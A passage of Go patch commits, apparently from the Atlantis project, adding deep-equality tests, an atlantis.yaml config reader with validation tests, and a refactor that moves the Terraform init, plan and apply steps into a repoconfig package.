t.Error("should be equal:", diff) + } + + diff = deep.Equal(a, a) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + b[2] = 333 + diff = deep.Equal(a, b) + if 
diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "slice[2]: 3 != 333" { + t.Error("wrong diff:", diff[0]) + } + + b = b[0:2] + diff = deep.Equal(a, b) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "slice[2]: 3 != " { + t.Error("wrong diff:", diff[0]) + } + + diff = deep.Equal(b, a) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "slice[2]: != 3" { + t.Error("wrong diff:", diff[0]) + } + + var c []int + diff = deep.Equal(a, c) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "[1 2 3] != " { + t.Error("wrong diff:", diff[0]) + } + + diff = deep.Equal(c, a) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != " != [1 2 3]" { + t.Error("wrong diff:", diff[0]) + } +} + +func TestPointer(t *testing.T) { + type T struct { + i int + } + a := &T{i: 1} + b := &T{i: 1} + diff := deep.Equal(a, b) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + a = nil + diff = deep.Equal(a, b) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != " != deep_test.T" { + t.Error("wrong diff:", diff[0]) + } + + a = b + b = nil + diff = deep.Equal(a, b) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "deep_test.T != " { + t.Error("wrong diff:", diff[0]) + } + + a = nil + b = nil + diff = deep.Equal(a, b) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } +} + +func TestTime(t *testing.T) { + // In an interable kind (i.e. 
a struct) + type sTime struct { + T time.Time + } + now := time.Now() + got := sTime{T: now} + expect := sTime{T: now.Add(1 * time.Second)} + diff := deep.Equal(got, expect) + if len(diff) != 1 { + t.Error("expected 1 diff:", diff) + } + + // Directly + a := now + b := now + diff = deep.Equal(a, b) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } +} + +func TestInterface(t *testing.T) { + a := map[string]interface{}{ + "foo": map[string]string{ + "bar": "a", + }, + } + b := map[string]interface{}{ + "foo": map[string]string{ + "bar": "b", + }, + } + diff := deep.Equal(a, b) + if len(diff) == 0 { + t.Fatalf("expected 1 diff, got zero") + } + if len(diff) != 1 { + t.Errorf("expected 1 diff, got %d", len(diff)) + } +} + +func TestInterface2(t *testing.T) { + defer func() { + if val := recover(); val != nil { + t.Fatalf("panic: %v", val) + } + }() + + a := map[string]interface{}{ + "bar": 1, + } + b := map[string]interface{}{ + "bar": 1.23, + } + diff := deep.Equal(a, b) + if len(diff) == 0 { + t.Fatalf("expected 1 diff, got zero") + } + if len(diff) != 1 { + t.Errorf("expected 1 diff, got %d", len(diff)) + } +} + +func TestInterface3(t *testing.T) { + type Value struct{ int } + a := map[string]interface{}{ + "foo": &Value{}, + } + b := map[string]interface{}{ + "foo": 1.23, + } + diff := deep.Equal(a, b) + if len(diff) == 0 { + t.Fatalf("expected 1 diff, got zero") + } + + if len(diff) != 1 { + t.Errorf("expected 1 diff, got: %s", diff) + } +} + +func TestError(t *testing.T) { + a := errors.New("it broke") + b := errors.New("it broke") + + diff := deep.Equal(a, b) + if len(diff) != 0 { + t.Fatalf("expected zero diffs, got %d: %s", len(diff), diff) + } + + b = errors.New("it fell apart") + diff = deep.Equal(a, b) + if len(diff) != 1 { + t.Fatalf("expected 1 diff, got %d", len(diff)) + } + if diff[0] != "it broke != it fell apart" { + t.Errorf("got '%s', expected 'it broke != it fell apart'", diff[0]) + } + + // Both errors set + type tWithError struct { + 
Error error + } + t1 := tWithError{ + Error: a, + } + t2 := tWithError{ + Error: b, + } + diff = deep.Equal(t1, t2) + if len(diff) != 1 { + t.Fatalf("expected 1 diff, got %d", len(diff)) + } + if diff[0] != "Error: it broke != it fell apart" { + t.Errorf("got '%s', expected 'Error: it broke != it fell apart'", diff[0]) + } + + // Both errors nil + t1 = tWithError{ + Error: nil, + } + t2 = tWithError{ + Error: nil, + } + diff = deep.Equal(t1, t2) + if len(diff) != 0 { + t.Log(diff) + t.Fatalf("expected 0 diff, got %d", len(diff)) + } + + // One error is nil + t1 = tWithError{ + Error: errors.New("foo"), + } + t2 = tWithError{ + Error: nil, + } + diff = deep.Equal(t1, t2) + if len(diff) != 1 { + t.Log(diff) + t.Fatalf("expected 1 diff, got %d", len(diff)) + } + if diff[0] != "Error: *errors.errorString != " { + t.Errorf("got '%s', expected 'Error: *errors.errorString != '", diff[0]) + } +} + +func TestNil(t *testing.T) { + type student struct { + name string + age int + } + + mark := student{"mark", 10} + var someNilThing interface{} = nil + diff := deep.Equal(someNilThing, mark) + if diff == nil { + t.Error("Nil value to comparision should not be equal") + } + diff = deep.Equal(mark, someNilThing) + if diff == nil { + t.Error("Nil value to comparision should not be equal") + } + diff = deep.Equal(someNilThing, someNilThing) + if diff != nil { + t.Error("Nil value to comparision should not be equal") + } +} From 42b6646cbe82005b3da4af856f492009f7fd8029 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Sat, 24 Mar 2018 18:50:01 -0700 Subject: [PATCH 07/69] Implement config reader and parser --- server/events/repoconfig/reader.go | 71 +++ server/events/repoconfig/reader_test.go | 612 ++++++++++++++++++++++++ 2 files changed, 683 insertions(+) create mode 100644 server/events/repoconfig/reader.go create mode 100644 server/events/repoconfig/reader_test.go diff --git a/server/events/repoconfig/reader.go b/server/events/repoconfig/reader.go new file mode 100644 index 
0000000000..77d4e505dc --- /dev/null +++ b/server/events/repoconfig/reader.go @@ -0,0 +1,71 @@ +package repoconfig + +import ( + "fmt" + "io/ioutil" + "os" + "path/filepath" + "strings" + + "github.com/pkg/errors" + "gopkg.in/yaml.v2" +) + +const AtlantisYAMLFilename = "atlantis.yaml" +const PlanStageName = "plan" +const ApplyStageName = "apply" + +type Reader struct{} + +// ReadConfig returns the parsed and validated config for repoDir. +// If there was no config, it returns a nil pointer. If there was an error +// in parsing it returns the error. +func (r *Reader) ReadConfig(repoDir string) (*RepoConfig, error) { + configFile := filepath.Join(repoDir, AtlantisYAMLFilename) + configData, err := ioutil.ReadFile(configFile) + + // If the file doesn't exist return nil. + if err != nil && os.IsNotExist(err) { + return nil, nil + } + + // If it exists but we couldn't read it return an error. + if err != nil { + return nil, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename) + } + + // If the config file exists, parse it. + config, err := r.parseAndValidate(configData) + if err != nil { + return nil, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename) + } + return &config, err +} + +func (r *Reader) parseAndValidate(configData []byte) (RepoConfig, error) { + var repoConfig RepoConfig + if err := yaml.UnmarshalStrict(configData, &repoConfig); err != nil { + // Unmarshal error messages aren't fit for user output. We need to + // massage them. + // todo: fix "field autoplan not found in struct repoconfig.alias" errors + return repoConfig, errors.New(strings.Replace(err.Error(), " into repoconfig.RepoConfig", "", -1)) + } + + // Validate version. + if repoConfig.Version != 2 { + // todo: this will fail old atlantis.yaml files, we should deal with them in a better way. + return repoConfig, errors.New("unknown version: must have \"version: 2\" set") + } + + // Validate projects. 
+ if len(repoConfig.Projects) == 0 { + return repoConfig, errors.New("'projects' key must exist and contain at least one element") + } + + for i, project := range repoConfig.Projects { + if project.Dir == "" { + return repoConfig, fmt.Errorf("project at index %d invalid: dir key must be set and non-empty", i) + } + } + return repoConfig, nil +} diff --git a/server/events/repoconfig/reader_test.go b/server/events/repoconfig/reader_test.go new file mode 100644 index 0000000000..20e36c9cf6 --- /dev/null +++ b/server/events/repoconfig/reader_test.go @@ -0,0 +1,612 @@ +package repoconfig_test + +import ( + "io/ioutil" + "path/filepath" + "testing" + + "github.com/runatlantis/atlantis/server/events/repoconfig" + . "github.com/runatlantis/atlantis/testing" +) + +func TestReadConfig_DirDoesNotExist(t *testing.T) { + r := repoconfig.Reader{} + conf, err := r.ReadConfig("/not/exist") + Ok(t, err) + Assert(t, conf == nil, "exp nil ptr") +} + +func TestReadConfig_FileDoesNotExist(t *testing.T) { + tmpDir, cleanup := TempDir(t) + defer cleanup() + + r := repoconfig.Reader{} + conf, err := r.ReadConfig(tmpDir) + Ok(t, err) + Assert(t, conf == nil, "exp nil ptr") +} + +func TestReadConfig_BadPermissions(t *testing.T) { + tmpDir, cleanup := TempDir(t) + defer cleanup() + err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), nil, 0000) + Ok(t, err) + + r := repoconfig.Reader{} + _, err = r.ReadConfig(tmpDir) + ErrContains(t, "unable to read atlantis.yaml file: ", err) +} + +func TestReadConfig_UnmarshalErrors(t *testing.T) { + // We only have a few cases here because we assume the YAML library to be + // well tested. See https://github.com/go-yaml/yaml/blob/v2/decode_test.go#L810. 
+ cases := []struct { + description string + input string + expErr string + }{ + { + "random characters", + "slkjds", + "parsing atlantis.yaml: yaml: unmarshal errors:\n line 1: cannot unmarshal !!str `slkjds`", + }, + { + "just a colon", + ":", + "parsing atlantis.yaml: yaml: did not find expected key", + }, + } + + tmpDir, cleanup := TempDir(t) + defer cleanup() + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) + Ok(t, err) + r := repoconfig.Reader{} + _, err = r.ReadConfig(tmpDir) + ErrEquals(t, c.expErr, err) + }) + } +} + +func TestReadConfig_Invalid(t *testing.T) { + cases := []struct { + description string + input string + expErr string + }{ + // Invalid version. + { + description: "no version", + input: `projects: +- dir: "." +`, + expErr: "unknown version: must have \"version: 2\" set", + }, + { + description: "unsupported version", + input: `version: 0 +projects: +- dir: "." +`, + expErr: "unknown version: must have \"version: 2\" set", + }, + { + description: "empty version", + input: `version: ~ +projects: +- dir: "." +`, + expErr: "unknown version: must have \"version: 2\" set", + }, + + // No projects specified. + { + description: "no projects key", + input: `version: 2`, + expErr: "'projects' key must exist and contain at least one element", + }, + { + description: "empty projects list", + input: `version: 2 +projects:`, + expErr: "'projects' key must exist and contain at least one element", + }, + + // Project must have dir set. 
+ { + description: "project with no config", + input: `version: 2 +projects: +-`, + expErr: "project at index 0 invalid: dir key must be set and non-empty", + }, + { + description: "project without dir set", + input: `version: 2 +projects: +- workspace: "staging"`, + expErr: "project at index 0 invalid: dir key must be set and non-empty", + }, + { + description: "project with dir set to empty string", + input: `version: 2 +projects: +- dir: ""`, + expErr: "project at index 0 invalid: dir key must be set and non-empty", + }, + { + description: "project with no config at index 1", + input: `version: 2 +projects: +- dir: "." +-`, + expErr: "project at index 1 invalid: dir key must be set and non-empty", + }, + // { + // "project with unknown key", + // `version: 2 + //projects: + //- unknown: value`, + // // todo: fix this test case + // "project at index 1 invalid: dir key must be set and non-empty", + // }, + // todo: more test cases + + // project workflow doesn't exist + // workflow has plan and apply keys (otherwise no point specifying it) + // plan/apply stages must have non-empty steps key + + // Test the steps key. + { + description: "unsupported step type", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + - unsupported`, + expErr: "unsupported step type: \"unsupported\"", + }, + + // Init step. + { + description: "unsupported arg to init step", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + - init: + extra_args: ["hi"] + hi: bye +`, + expErr: "unsupported key \"hi\" for step init – the only supported key is extra_args", + }, + { + description: "invalid value type to init step's extra_args", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + - init: + extra_args: arg +`, + expErr: "expected array of strings as value of extra_args, not \"arg\"", + }, + + // Plan step. 
+ { + description: "unsupported arg to plan step", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + - plan: + extra_args: ["hi"] + hi: bye +`, + expErr: "unsupported key \"hi\" for step plan – the only supported key is extra_args", + }, + { + description: "invalid value type to plan step's extra_args", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + - plan: + extra_args: arg +`, + expErr: "expected array of strings as value of extra_args, not \"arg\"", + }, + + // Apply step. + { + description: "unsupported arg to apply step", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + - apply: + extra_args: ["hi"] + hi: bye +`, + expErr: "unsupported key \"hi\" for step apply – the only supported key is extra_args", + }, + { + description: "invalid value type to apply step's extra_args", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + - apply: + extra_args: arg +`, + expErr: "expected array of strings as value of extra_args, not \"arg\"", + }, + } + + tmpDir, cleanup := TempDir(t) + defer cleanup() + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) + Ok(t, err) + + r := repoconfig.Reader{} + _, err = r.ReadConfig(tmpDir) + ErrEquals(t, "parsing atlantis.yaml: "+c.expErr, err) + }) + } +} + +func TestReadConfig_Successes(t *testing.T) { + basicProjects := []repoconfig.Project{ + { + AutoPlan: &repoconfig.AutoPlan{ + Enabled: true, + WhenModified: []string{"**/*.tf"}, + }, + Workspace: "default", + TerraformVersion: "", + ApplyRequirements: nil, + Workflow: "", + Dir: ".", + }, + } + + cases := []struct { + description string + input string + expOutput repoconfig.RepoConfig + }{ + { + description: "uses project defaults", + input: `version: 2 +projects: +- dir: "."`, + expOutput: repoconfig.RepoConfig{ + 
Version: 2, + Projects: basicProjects, + }, + }, + { + description: "autoplan is enabled by default", + input: `version: 2 +projects: +- dir: "." + auto_plan: + when_modified: ["**/*.tf"] +`, + expOutput: repoconfig.RepoConfig{ + Version: 2, + Projects: basicProjects, + }, + }, + { + description: "if workflows not defined, there are none", + input: `version: 2 +projects: +- dir: "." +`, + expOutput: repoconfig.RepoConfig{ + Version: 2, + Projects: basicProjects, + }, + }, + { + description: "if workflows key set but with no workflows there are none", + input: `version: 2 +projects: +- dir: "." +workflows: ~ +`, + expOutput: repoconfig.RepoConfig{ + Version: 2, + Projects: basicProjects, + }, + }, + { + description: "if a workflow is defined but set to null we use the defaults", + input: `version: 2 +projects: +- dir: "." +workflows: + default: ~ +`, + expOutput: repoconfig.RepoConfig{ + Version: 2, + Projects: basicProjects, + Workflows: map[string]repoconfig.Workflow{ + "default": { + Plan: &repoconfig.Stage{ + Steps: []repoconfig.StepConfig{ + { + StepType: "init", + }, + { + StepType: "plan", + }, + }, + }, + Apply: &repoconfig.Stage{ + Steps: []repoconfig.StepConfig{ + { + StepType: "apply", + }, + }, + }, + }, + }, + }, + }, + { + description: "if a plan or apply has no steps defined then we use the defaults", + input: `version: 2 +projects: +- dir: "." +workflows: + default: + plan: + apply: +`, + expOutput: repoconfig.RepoConfig{ + Version: 2, + Projects: basicProjects, + Workflows: map[string]repoconfig.Workflow{ + "default": { + Plan: &repoconfig.Stage{ + Steps: []repoconfig.StepConfig{ + { + StepType: "init", + }, + { + StepType: "plan", + }, + }, + }, + Apply: &repoconfig.Stage{ + Steps: []repoconfig.StepConfig{ + { + StepType: "apply", + }, + }, + }, + }, + }, + }, + }, + { + description: "if a plan or apply has no steps defined then we use the defaults", + input: `version: 2 +projects: +- dir: "." 
+workflows: + default: + plan: + apply: +`, + expOutput: repoconfig.RepoConfig{ + Version: 2, + Projects: basicProjects, + Workflows: map[string]repoconfig.Workflow{ + "default": { + Plan: &repoconfig.Stage{ + Steps: []repoconfig.StepConfig{ + { + StepType: "init", + }, + { + StepType: "plan", + }, + }, + }, + Apply: &repoconfig.Stage{ + Steps: []repoconfig.StepConfig{ + { + StepType: "apply", + }, + }, + }, + }, + }, + }, + }, + { + description: "if a plan or apply explicitly defines an empty steps key then there are no steps", + input: `version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + apply: + steps: +`, + expOutput: repoconfig.RepoConfig{ + Version: 2, + Projects: basicProjects, + Workflows: map[string]repoconfig.Workflow{ + "default": { + Plan: &repoconfig.Stage{ + Steps: nil, + }, + Apply: &repoconfig.Stage{ + Steps: nil, + }, + }, + }, + }, + }, + { + description: "if a plan or apply explicitly defines an empty steps key then there are no steps", + input: `version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + apply: + steps: +`, + expOutput: repoconfig.RepoConfig{ + Version: 2, + Projects: basicProjects, + Workflows: map[string]repoconfig.Workflow{ + "default": { + Plan: &repoconfig.Stage{ + Steps: nil, + }, + Apply: &repoconfig.Stage{ + Steps: nil, + }, + }, + }, + }, + }, + { + description: "if steps are set then we parse them properly", + input: `version: 2 +projects: +- dir: "." 
+workflows: + default: + plan: + steps: + - init + apply: + steps: + - plan # we don't validate if they make sense +`, + expOutput: repoconfig.RepoConfig{ + Version: 2, + Projects: basicProjects, + Workflows: map[string]repoconfig.Workflow{ + "default": { + Plan: &repoconfig.Stage{ + Steps: []repoconfig.StepConfig{ + { + StepType: "init", + }, + }, + }, + Apply: &repoconfig.Stage{ + Steps: []repoconfig.StepConfig{ + { + StepType: "plan", + }, + }, + }, + }, + }, + }, + }, + { + description: "we parse extra_args for the steps", + input: `version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + - init: + extra_args: [] + apply: + steps: + - plan: + extra_args: ["a", "b"] +`, + expOutput: repoconfig.RepoConfig{ + Version: 2, + Projects: basicProjects, + Workflows: map[string]repoconfig.Workflow{ + "default": { + Plan: &repoconfig.Stage{ + Steps: []repoconfig.StepConfig{ + { + StepType: "init", + ExtraArgs: nil, + }, + }, + }, + Apply: &repoconfig.Stage{ + Steps: []repoconfig.StepConfig{ + { + StepType: "plan", + ExtraArgs: []string{"a", "b"}, + }, + }, + }, + }, + }, + }, + }, + } + + tmpDir, cleanup := TempDir(t) + defer cleanup() + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) + Ok(t, err) + + r := repoconfig.Reader{} + act, err := r.ReadConfig(tmpDir) + Ok(t, err) + Equals(t, &c.expOutput, act) + }) + } +} From 75a55dd6967fb04f33fac4cb788f361db1eff5ea Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Sat, 24 Mar 2018 18:51:33 -0700 Subject: [PATCH 08/69] Moved into new package --- server/events/atlantisyaml/init_step.go | 32 ----------- .../apply_step.go | 12 ++--- .../apply_step_test.go | 33 +++++------- server/events/repoconfig/init_step.go | 20 +++++++ .../init_step_test.go | 12 ++--- .../{atlantisyaml => repoconfig}/plan_step.go | 15 +++--- .../plan_step_test.go | 54 +++++++++---------- 7 files changed, 76 insertions(+), 102 
deletions(-) delete mode 100644 server/events/atlantisyaml/init_step.go rename server/events/{atlantisyaml => repoconfig}/apply_step.go (62%) rename server/events/{atlantisyaml => repoconfig}/apply_step_test.go (74%) create mode 100644 server/events/repoconfig/init_step.go rename server/events/{atlantisyaml => repoconfig}/init_step_test.go (87%) rename server/events/{atlantisyaml => repoconfig}/plan_step.go (80%) rename server/events/{atlantisyaml => repoconfig}/plan_step_test.go (90%) diff --git a/server/events/atlantisyaml/init_step.go b/server/events/atlantisyaml/init_step.go deleted file mode 100644 index a25cb94fe4..0000000000 --- a/server/events/atlantisyaml/init_step.go +++ /dev/null @@ -1,32 +0,0 @@ -package atlantisyaml - -import "github.com/hashicorp/go-version" - -// InitStep runs `terraform init`. -type InitStep struct { - ExtraArgs []string - TerraformExecutor TerraformExec - Meta StepMeta -} - -func (i *InitStep) Run() (string, error) { - // If we're running < 0.9 we have to use `terraform get` instead of `init`. - if MustConstraint("< 0.9.0").Check(i.Meta.TerraformVersion) { - i.Meta.Log.Info("running terraform version %s so will use `get` instead of `init`", i.Meta.TerraformVersion) - terraformGetCmd := append([]string{"get", "-no-color"}, i.ExtraArgs...) - _, err := i.TerraformExecutor.RunCommandWithVersion(i.Meta.Log, i.Meta.AbsolutePath, terraformGetCmd, i.Meta.TerraformVersion, i.Meta.Workspace) - return "", err - } else { - _, err := i.TerraformExecutor.RunCommandWithVersion(i.Meta.Log, i.Meta.AbsolutePath, append([]string{"init", "-no-color"}, i.ExtraArgs...), i.Meta.TerraformVersion, i.Meta.Workspace) - return "", err - } -} - -// MustConstraint returns a constraint. It panics on error. 
-func MustConstraint(constraint string) version.Constraints { - c, err := version.NewConstraint(constraint) - if err != nil { - panic(err) - } - return c -} diff --git a/server/events/atlantisyaml/apply_step.go b/server/events/repoconfig/apply_step.go similarity index 62% rename from server/events/atlantisyaml/apply_step.go rename to server/events/repoconfig/apply_step.go index c75d4ae3c2..d883c3a02c 100644 --- a/server/events/atlantisyaml/apply_step.go +++ b/server/events/repoconfig/apply_step.go @@ -1,19 +1,15 @@ -package atlantisyaml +package repoconfig import ( "fmt" "os" "path/filepath" - - "github.com/runatlantis/atlantis/server/events/vcs" ) // ApplyStep runs `terraform apply`. type ApplyStep struct { - ExtraArgs []string - VCSClient vcs.ClientProxy - TerraformExecutor TerraformExec - Meta StepMeta + ExtraArgs []string + Meta StepMeta } func (a *ApplyStep) Run() (string, error) { @@ -24,5 +20,5 @@ func (a *ApplyStep) Run() (string, error) { } tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, a.ExtraArgs...), a.Meta.ExtraCommentArgs...), planPath) - return a.TerraformExecutor.RunCommandWithVersion(a.Meta.Log, a.Meta.AbsolutePath, tfApplyCmd, a.Meta.TerraformVersion, a.Meta.Workspace) + return a.Meta.TerraformExecutor.RunCommandWithVersion(a.Meta.Log, a.Meta.AbsolutePath, tfApplyCmd, a.Meta.TerraformVersion, a.Meta.Workspace) } diff --git a/server/events/atlantisyaml/apply_step_test.go b/server/events/repoconfig/apply_step_test.go similarity index 74% rename from server/events/atlantisyaml/apply_step_test.go rename to server/events/repoconfig/apply_step_test.go index 0502ab2e1f..37e0af2f71 100644 --- a/server/events/atlantisyaml/apply_step_test.go +++ b/server/events/repoconfig/apply_step_test.go @@ -1,23 +1,22 @@ -package atlantisyaml_test +package repoconfig_test import ( "io/ioutil" - "os" "path/filepath" "testing" "github.com/hashicorp/go-version" . 
"github.com/petergtz/pegomock" - "github.com/runatlantis/atlantis/server/events/atlantisyaml" "github.com/runatlantis/atlantis/server/events/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/repoconfig" matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" "github.com/runatlantis/atlantis/server/events/terraform/mocks" . "github.com/runatlantis/atlantis/testing" ) func TestRun_NoDir(t *testing.T) { - s := atlantisyaml.ApplyStep{ - Meta: atlantisyaml.StepMeta{ + s := repoconfig.ApplyStep{ + Meta: repoconfig.StepMeta{ Workspace: "workspace", AbsolutePath: "nonexistent/path", DirRelativeToRepoRoot: ".", @@ -31,11 +30,11 @@ func TestRun_NoDir(t *testing.T) { } func TestRun_NoPlanFile(t *testing.T) { - tmpDir, cleanup := tmpDir_stepTests(t) + tmpDir, cleanup := TempDir(t) defer cleanup() - s := atlantisyaml.ApplyStep{ - Meta: atlantisyaml.StepMeta{ + s := repoconfig.ApplyStep{ + Meta: repoconfig.StepMeta{ Workspace: "workspace", AbsolutePath: tmpDir, DirRelativeToRepoRoot: ".", @@ -49,7 +48,7 @@ func TestRun_NoPlanFile(t *testing.T) { } func TestRun_Success(t *testing.T) { - tmpDir, cleanup := tmpDir_stepTests(t) + tmpDir, cleanup := TempDir(t) defer cleanup() planPath := filepath.Join(tmpDir, "workspace.tfplan") err := ioutil.WriteFile(planPath, nil, 0644) @@ -59,17 +58,17 @@ func TestRun_Success(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion("0.11.4") - s := atlantisyaml.ApplyStep{ - Meta: atlantisyaml.StepMeta{ + s := repoconfig.ApplyStep{ + Meta: repoconfig.StepMeta{ Workspace: "workspace", AbsolutePath: tmpDir, DirRelativeToRepoRoot: ".", + TerraformExecutor: terraform, TerraformVersion: tfVersion, ExtraCommentArgs: []string{"comment", "args"}, Username: "username", }, - ExtraArgs: []string{"extra", "args"}, - TerraformExecutor: terraform, + ExtraArgs: []string{"extra", "args"}, } When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), 
matchers2.AnyPtrToGoVersionVersion(), AnyString())). @@ -79,11 +78,3 @@ func TestRun_Success(t *testing.T) { Equals(t, "output", output) terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, tfVersion, "workspace") } - -// tmpDir_stepTests creates a temporary directory and returns its path along -// with a cleanup function to be called via defer. -func tmpDir_stepTests(t *testing.T) (string, func()) { - tmpDir, err := ioutil.TempDir("", "") - Ok(t, err) - return tmpDir, func() { os.RemoveAll(tmpDir) } -} diff --git a/server/events/repoconfig/init_step.go b/server/events/repoconfig/init_step.go new file mode 100644 index 0000000000..022399c4fb --- /dev/null +++ b/server/events/repoconfig/init_step.go @@ -0,0 +1,20 @@ +package repoconfig + +// InitStep runs `terraform init`. +type InitStep struct { + ExtraArgs []string + Meta StepMeta +} + +func (i *InitStep) Run() (string, error) { + // If we're running < 0.9 we have to use `terraform get` instead of `init`. + if MustConstraint("< 0.9.0").Check(i.Meta.TerraformVersion) { + i.Meta.Log.Info("running terraform version %s so will use `get` instead of `init`", i.Meta.TerraformVersion) + terraformGetCmd := append([]string{"get", "-no-color"}, i.ExtraArgs...) 
+ _, err := i.Meta.TerraformExecutor.RunCommandWithVersion(i.Meta.Log, i.Meta.AbsolutePath, terraformGetCmd, i.Meta.TerraformVersion, i.Meta.Workspace) + return "", err + } else { + _, err := i.Meta.TerraformExecutor.RunCommandWithVersion(i.Meta.Log, i.Meta.AbsolutePath, append([]string{"init", "-no-color"}, i.ExtraArgs...), i.Meta.TerraformVersion, i.Meta.Workspace) + return "", err + } +} diff --git a/server/events/atlantisyaml/init_step_test.go b/server/events/repoconfig/init_step_test.go similarity index 87% rename from server/events/atlantisyaml/init_step_test.go rename to server/events/repoconfig/init_step_test.go index 8704f832df..1996e18d18 100644 --- a/server/events/atlantisyaml/init_step_test.go +++ b/server/events/repoconfig/init_step_test.go @@ -1,12 +1,12 @@ -package atlantisyaml_test +package repoconfig_test import ( "testing" "github.com/hashicorp/go-version" . "github.com/petergtz/pegomock" - "github.com/runatlantis/atlantis/server/events/atlantisyaml" "github.com/runatlantis/atlantis/server/events/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/repoconfig" matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" "github.com/runatlantis/atlantis/server/events/terraform/mocks" "github.com/runatlantis/atlantis/server/logging" @@ -43,18 +43,18 @@ func TestRun_UsesGetOrInitForRightVersion(t *testing.T) { tfVersion, _ := version.NewVersion(c.version) logger := logging.NewNoopLogger() - s := atlantisyaml.InitStep{ - Meta: atlantisyaml.StepMeta{ + s := repoconfig.InitStep{ + Meta: repoconfig.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: "/path", DirRelativeToRepoRoot: ".", TerraformVersion: tfVersion, + TerraformExecutor: terraform, ExtraCommentArgs: []string{"comment", "args"}, Username: "username", }, - ExtraArgs: []string{"extra", "args"}, - TerraformExecutor: terraform, + ExtraArgs: []string{"extra", "args"}, } When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), 
AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). diff --git a/server/events/atlantisyaml/plan_step.go b/server/events/repoconfig/plan_step.go similarity index 80% rename from server/events/atlantisyaml/plan_step.go rename to server/events/repoconfig/plan_step.go index 646506381b..6e7df0db0b 100644 --- a/server/events/atlantisyaml/plan_step.go +++ b/server/events/repoconfig/plan_step.go @@ -1,4 +1,4 @@ -package atlantisyaml +package repoconfig import ( "fmt" @@ -14,9 +14,8 @@ const defaultWorkspace = "default" // PlanStep runs `terraform plan`. type PlanStep struct { - ExtraArgs []string - TerraformExecutor TerraformExec - Meta StepMeta + ExtraArgs []string + Meta StepMeta } func (p *PlanStep) Run() (string, error) { @@ -42,7 +41,7 @@ func (p *PlanStep) Run() (string, error) { tfPlanCmd = append(tfPlanCmd, "-var-file", optionalEnvFile) } - return p.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, filepath.Join(p.Meta.AbsolutePath), tfPlanCmd, p.Meta.TerraformVersion, p.Meta.Workspace) + return p.Meta.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, filepath.Join(p.Meta.AbsolutePath), tfPlanCmd, p.Meta.TerraformVersion, p.Meta.Workspace) } // switchWorkspace changes the terraform workspace if necessary and will create @@ -68,7 +67,7 @@ func (p *PlanStep) switchWorkspace() error { // already in the right workspace then no need to switch. This will save us // about ten seconds. This command is only available in > 0.10. if !runningZeroPointNine { - workspaceShowOutput, err := p.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "show"}, p.Meta.TerraformVersion, p.Meta.Workspace) + workspaceShowOutput, err := p.Meta.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "show"}, p.Meta.TerraformVersion, p.Meta.Workspace) if err != nil { return err } @@ -83,11 +82,11 @@ func (p *PlanStep) switchWorkspace() error { // we can create it if it doesn't. 
